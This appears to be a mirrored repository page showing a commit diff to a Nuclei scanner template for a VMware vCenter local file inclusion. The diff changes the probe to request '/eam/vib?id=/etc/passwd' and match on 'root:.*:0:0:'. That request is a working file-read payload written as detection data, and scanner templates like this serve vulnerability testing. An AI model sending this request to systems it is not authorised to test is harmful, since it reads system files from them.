daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #6817 from projectdiscovery/DhiyaneshGeek-patch-1 

Fix FP Vmware LFI
patch-1
Prince Chaddha 2023-03-03 00:41:39 +05:30 committed by GitHub
parent 7d11a0e2af 8b43d840f8
commit 2f6ceda18f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 6 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

13
vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml
View File

@ -9,15 +9,14 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5 cvss-score: 7.5
cwe-id: CWE-22 cwe-id: CWE-22
tags: vmware,lfi,vcenter tags: vmware,lfi,vcenter,linux
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/eam/vib?id=/etc/issue" - "{{BaseURL}}/eam/vib?id=/etc/passwd"
matchers:
- type: word
words:
- "vCenter Server"
# Enhanced by mp on 2022/08/01 matchers:
- type: regex
regex:
- "root:.*:0:0:"